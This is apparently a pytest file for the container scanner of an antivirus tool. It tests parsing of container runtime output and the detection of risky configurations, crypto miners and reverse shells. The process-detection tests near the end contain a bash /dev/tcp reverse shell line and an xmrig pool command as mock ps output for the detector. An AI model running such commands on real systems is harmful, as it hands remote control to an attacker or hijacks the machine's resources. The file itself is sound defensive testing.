Files
calvana/ayn-antivirus/tests/test_container_scanner.py

406 lines
14 KiB
Python

"""Tests for the container scanner module."""
from __future__ import annotations
import json
from unittest.mock import patch
import pytest
from ayn_antivirus.scanners.container_scanner import (
ContainerInfo,
ContainerScanResult,
ContainerScanner,
ContainerThreat,
)
# ---------------------------------------------------------------------------
# Data class tests
# ---------------------------------------------------------------------------
class TestContainerInfo:
def test_defaults(self):
ci = ContainerInfo(
container_id="abc", name="web", image="nginx",
status="running", runtime="docker", created="2026-01-01",
)
assert ci.ports == []
assert ci.mounts == []
assert ci.pid == 0
assert ci.ip_address == ""
assert ci.labels == {}
def test_to_dict(self):
ci = ContainerInfo(
container_id="abc", name="web", image="nginx:1.25",
status="running", runtime="docker", created="2026-01-01",
ports=["80:80"], mounts=["/data"], pid=42,
ip_address="10.0.0.2", labels={"env": "prod"},
)
d = ci.to_dict()
assert d["container_id"] == "abc"
assert d["ports"] == ["80:80"]
assert d["labels"] == {"env": "prod"}
class TestContainerThreat:
def test_to_dict(self):
ct = ContainerThreat(
container_id="abc", container_name="web", runtime="docker",
threat_name="Miner.X", threat_type="miner",
severity="CRITICAL", details="found xmrig",
)
d = ct.to_dict()
assert d["threat_name"] == "Miner.X"
assert d["severity"] == "CRITICAL"
assert len(d["timestamp"]) == 19
def test_optional_fields(self):
ct = ContainerThreat(
container_id="x", container_name="y", runtime="podman",
threat_name="T", threat_type="malware", severity="HIGH",
details="d", file_path="/tmp/bad", process_name="evil",
)
d = ct.to_dict()
assert d["file_path"] == "/tmp/bad"
assert d["process_name"] == "evil"
class TestContainerScanResult:
def test_empty_is_clean(self):
r = ContainerScanResult(scan_id="t", start_time="2026-01-01 00:00:00")
assert r.is_clean is True
assert r.duration_seconds == 0.0
def test_with_threats(self):
ct = ContainerThreat(
container_id="a", container_name="b", runtime="docker",
threat_name="T", threat_type="miner", severity="HIGH",
details="d",
)
r = ContainerScanResult(
scan_id="t",
start_time="2026-01-01 00:00:00",
end_time="2026-01-01 00:00:10",
threats=[ct],
)
assert r.is_clean is False
assert r.duration_seconds == 10.0
def test_to_dict(self):
r = ContainerScanResult(
scan_id="t",
start_time="2026-01-01 00:00:00",
end_time="2026-01-01 00:00:03",
containers_found=2,
containers_scanned=1,
errors=["oops"],
)
d = r.to_dict()
assert d["threats_found"] == 0
assert d["duration_seconds"] == 3.0
assert d["errors"] == ["oops"]
# ---------------------------------------------------------------------------
# Scanner tests
# ---------------------------------------------------------------------------
class TestContainerScanner:
def test_properties(self):
s = ContainerScanner()
assert s.name == "container_scanner"
assert "Docker" in s.description
assert isinstance(s.available_runtimes, list)
def test_no_runtimes_graceful(self):
"""With no runtimes installed scan returns an error, not an exception."""
s = ContainerScanner()
s._available_runtimes = []
s._docker_cmd = None
s._podman_cmd = None
s._lxc_cmd = None
r = s.scan("all")
assert isinstance(r, ContainerScanResult)
assert r.containers_found == 0
assert len(r.errors) == 1
assert "No container runtimes" in r.errors[0]
def test_scan_returns_result(self):
s = ContainerScanner()
r = s.scan("all")
assert isinstance(r, ContainerScanResult)
assert r.scan_id
assert r.start_time
assert r.end_time
def test_scan_container_delegates(self):
s = ContainerScanner()
s._available_runtimes = []
r = s.scan_container("some-id")
assert isinstance(r, ContainerScanResult)
def test_run_cmd_timeout(self):
_, stderr, rc = ContainerScanner._run_cmd(["sleep", "10"], timeout=1)
assert rc == -1
assert "timed out" in stderr.lower()
def test_run_cmd_not_found(self):
_, stderr, rc = ContainerScanner._run_cmd(
["this_command_does_not_exist_xyz"],
)
assert rc == -1
assert "not found" in stderr.lower() or "No such file" in stderr
def test_find_command(self):
# python3 should exist everywhere
assert ContainerScanner._find_command("python3") is not None
assert ContainerScanner._find_command("no_such_binary_xyz") is None
# ---------------------------------------------------------------------------
# Mock-based integration tests
# ---------------------------------------------------------------------------
class TestDockerParsing:
"""Test Docker output parsing with mocked subprocess calls."""
def _make_scanner(self):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
s._available_runtimes = ["docker"]
return s
def test_list_docker_parses_output(self):
ps_output = (
"abc123456789\tweb\tnginx:1.25\tUp 2 hours\t"
"2026-01-01 00:00:00\t0.0.0.0:80->80/tcp"
)
inspect_output = json.dumps([{
"State": {"Pid": 42},
"NetworkSettings": {"Networks": {"bridge": {"IPAddress": "172.17.0.2"}}},
"Mounts": [{"Source": "/data"}],
"Config": {"Labels": {"app": "web"}},
}])
s = self._make_scanner()
with patch.object(s, "_run_cmd") as mock_run:
mock_run.side_effect = [
(ps_output, "", 0), # docker ps
(inspect_output, "", 0), # docker inspect
]
containers = s._list_docker()
assert len(containers) == 1
c = containers[0]
assert c.name == "web"
assert c.image == "nginx:1.25"
assert c.status == "running"
assert c.runtime == "docker"
assert c.pid == 42
assert c.ip_address == "172.17.0.2"
assert "/data" in c.mounts
assert c.labels == {"app": "web"}
def test_list_docker_ps_failure(self):
s = self._make_scanner()
with patch.object(s, "_run_cmd", return_value=("", "error", 1)):
assert s._list_docker() == []
def test_inspect_docker_bad_json(self):
s = self._make_scanner()
with patch.object(s, "_run_cmd", return_value=("not json", "", 0)):
assert s._inspect_docker("abc") == {}
class TestPodmanParsing:
def test_list_podman_parses_json(self):
s = ContainerScanner()
s._podman_cmd = "/usr/bin/podman"
s._available_runtimes = ["podman"]
podman_output = json.dumps([{
"Id": "def456789012abcdef",
"Names": ["db"],
"Image": "postgres:16",
"State": "running",
"Created": "2026-01-01",
"Ports": [{"hostPort": 5432, "containerPort": 5432}],
"Pid": 99,
"Labels": {},
}])
with patch.object(s, "_run_cmd", return_value=(podman_output, "", 0)):
containers = s._list_podman()
assert len(containers) == 1
assert containers[0].name == "db"
assert containers[0].runtime == "podman"
assert containers[0].pid == 99
class TestLXCParsing:
def test_list_lxc_parses_output(self):
s = ContainerScanner()
s._lxc_cmd = "/usr/bin/lxc-ls"
s._available_runtimes = ["lxc"]
lxc_output = "NAME STATE IPV4 PID\ntest1 RUNNING 10.0.3.5 1234"
with patch.object(s, "_run_cmd", return_value=(lxc_output, "", 0)):
containers = s._list_lxc()
assert len(containers) == 1
assert containers[0].name == "test1"
assert containers[0].status == "running"
assert containers[0].ip_address == "10.0.3.5"
assert containers[0].pid == 1234
class TestMisconfigDetection:
"""Test misconfiguration detection with mocked inspect output."""
def _scan_misconfig(self, inspect_data):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
ci = ContainerInfo(
container_id="abc", name="test", image="img",
status="running", runtime="docker", created="",
)
with patch.object(s, "_run_cmd", return_value=(json.dumps([inspect_data]), "", 0)):
return s._check_misconfigurations(ci)
def test_privileged_mode(self):
threats = self._scan_misconfig({
"HostConfig": {"Privileged": True},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "PrivilegedMode.Container" in names
def test_root_user(self):
threats = self._scan_misconfig({
"HostConfig": {},
"Config": {"User": ""},
})
names = [t.threat_name for t in threats]
assert "RunAsRoot.Container" in names
def test_host_network(self):
threats = self._scan_misconfig({
"HostConfig": {"NetworkMode": "host"},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "HostNetwork.Container" in names
def test_host_pid(self):
threats = self._scan_misconfig({
"HostConfig": {"PidMode": "host"},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "HostPID.Container" in names
def test_dangerous_caps(self):
threats = self._scan_misconfig({
"HostConfig": {"CapAdd": ["SYS_ADMIN", "NET_RAW"]},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "DangerousCap.Container.SYS_ADMIN" in names
assert "DangerousCap.Container.NET_RAW" in names
def test_sensitive_mount(self):
threats = self._scan_misconfig({
"HostConfig": {},
"Config": {"User": "app"},
"Mounts": [{"Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}],
})
names = [t.threat_name for t in threats]
assert "SensitiveMount.Container" in names
def test_no_resource_limits(self):
threats = self._scan_misconfig({
"HostConfig": {"Memory": 0, "CpuQuota": 0},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "NoResourceLimits.Container" in names
def test_security_disabled(self):
threats = self._scan_misconfig({
"HostConfig": {"SecurityOpt": ["seccomp=unconfined"]},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "SecurityDisabled.Container" in names
def test_clean_config(self):
threats = self._scan_misconfig({
"HostConfig": {"Memory": 512000000, "CpuQuota": 50000},
"Config": {"User": "app"},
})
# Should have no misconfig threats
assert len(threats) == 0
class TestImageCheck:
def test_latest_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx:latest",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert any("LatestTag" in t.threat_name for t in threats)
def test_no_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert any("LatestTag" in t.threat_name for t in threats)
def test_pinned_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx:1.25.3",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert len(threats) == 0
class TestProcessDetection:
def _make_scanner_and_container(self):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
ci = ContainerInfo(
container_id="abc", name="test", image="img",
status="running", runtime="docker", created="",
)
return s, ci
def test_miner_detected(self):
s, ci = self._make_scanner_and_container()
ps_output = (
"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
"root 1 95.0 8.0 123456 65432 ? Sl 00:00 1:23 /usr/bin/xmrig --pool pool.example.com"
)
with patch.object(s, "_run_cmd", return_value=(ps_output, "", 0)):
threats = s._check_processes(ci)
names = [t.threat_name for t in threats]
assert any("CryptoMiner" in n for n in names)
def test_reverse_shell_detected(self):
s, ci = self._make_scanner_and_container()
ps_output = (
"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
"root 1 0.1 0.0 1234 432 ? S 00:00 0:00 bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
)
with patch.object(s, "_run_cmd", return_value=(ps_output, "", 0)):
threats = s._check_processes(ci)
names = [t.threat_name for t in threats]
assert any("ReverseShell" in n for n in names)
def test_stopped_container_skipped(self):
s, ci = self._make_scanner_and_container()
ci.status = "stopped"
# _get_exec_prefix returns None for stopped containers
threats = s._check_processes(ci)
assert threats == []